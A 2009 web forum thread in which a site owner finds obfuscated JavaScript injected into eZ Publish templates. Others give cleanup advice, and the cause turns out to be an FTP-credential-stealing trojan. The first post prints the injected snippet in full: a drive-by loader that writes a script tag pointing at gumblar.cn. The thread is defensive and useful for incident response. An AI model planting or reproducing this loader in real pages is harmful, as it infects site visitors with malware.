Hacked?

Monday 11 May 2009 11:10:52 am

Is this hacker code?

<!-- 
(function(MI159){var r1jL='%';var Xow='v<61r<20a<3d<22ScriptEn<67ine<22<2cb<3d<22Version()+<22<2c<6a<3d<22<22<2c<75<3dnaviga<74<6fr<2eus<65rAg<65<6e<74<3bi<66(<28u<2eindex<4ff(<22<57in<22)<3e<30)<26<26(u<2eindexOf(<22NT<206<22)<3c0)<26<26(d<6fcum<65nt<2e<63ooki<65<2eindexO<66(<22<6diek<3d<31<22)<3c0)<26<26(type<6f<66<28zr<76zts)<21<3d<74<79p<65o<66(<22A<22)))<7bz<72vzts<3d<22A<22<3beva<6c(<22i<66(<77indow<2e<22<2ba+<22)j<3dj+<22+<61+<22Major<22+<62<2ba<2b<22M<69n<6fr<22+b+a+<22<42uild<22<2bb<2b<22j<3b<22)<3bdoc<75<6dent<2ewr<69t<65(<22<3c<73cri<70t<20src<3d<2f<2f<67umblar<2ec<6e<2frss<2f<3fi<64<3d<22+j+<22<3e<3c<5c<2fscr<69pt<3e<22)<3b<7d';var OBEG=Xow.replace(MI159,r1jL);eval(unescape(OBEG))})(/</g);
 -->

It's wrapped in javascript tags and I found it under the html head tag in one of my ezpublish installs.

Asking stupid questions so you don't have to!

Monday 11 May 2009 1:06:33 pm

It just appeared from nowhere so I'm assuming a hack through a vulnerability.

Warning: Visiting this site may harm your computer!
The website at www.ne0.co.uk contains elements from the site gumblar.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for gumblar.cn

and it's also on the admin http://www.ne0.co.uk/ezwebin_site_admin/

Literal HTML is not enabled

I don't think it's a specific ezpublish hack as it's also on a friends non ezp site

The website at www.crystal-jewels.co.uk contains elements from the site gumblar.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

Asking stupid questions so you don't have to!

Monday 11 May 2009 1:40:07 pm

There's nothing between the head and body tag in that file

but I have found it in

/design/base/templates/loginpagelayout.tpl
/design/standard/templates/loginpagelayout.tpl

/design/base/templates/pagelayout.tpl
/design/standard/templates/pagelayout.tpl

I've reloaded the design directory but it's still inthere somewhere.

I've instructed my hosts to investigate.

Thanks for your help

Asking stupid questions so you don't have to!

Tuesday 12 May 2009 6:33:25 am

I have had to clean up a few compromised servers that had code like that embedded in html and tpl files.. its hard work.

Be very very careful and thorough. Just removing the added part from templates is not enough, rootkits that do this usually also install several fallback routines to re-infect stuff and there also may be backdoors and keyloggers installed in system binaries. sshd is often modified, to collect passwords, for example.

General approach:
1. make extra full backup of whole system.
2. use iptables rules to forbid ALL net traffic, both incoming and outgoing, except ip of computer you are working from. This is so that hacker cant access it while you work, and perhaps cant do a last minute rm -rf or whatnot.
3. Very carefully find any changes to the system and reverse them. find -ctime is your best friend. Also it is useful to compare filesystem to last backup made while uninfected. Pay special attention to /etc and /usr filesystems. Reverse any changes, update outdated programs, add security measures etc.
3b. It may be best idea to completely reinstall the OS clean, and transfer the cleaned web applications to new host. Takes less time than cleaning out compromised OS and is securer.
4. Remove iptables restriction. Keep keen eye on server for week or more, looking for signs of reinfection. Make full backup offsite at least once a day.

If any of the above is Greek for you, get help from a server professional.

Certified eZ developer looking for projects.
zurgutt at gg.ee

Thursday 14 May 2009 3:43:41 am

I have found out that the problem lies on the computer with FTP access, NOT the server.

It's a TROJAN that hijacks FTP details from FTP programs and uploads new code into the files. Very Sneaky...

Make sure all your anitvirus software is up to date!!

Asking stupid questions so you don't have to!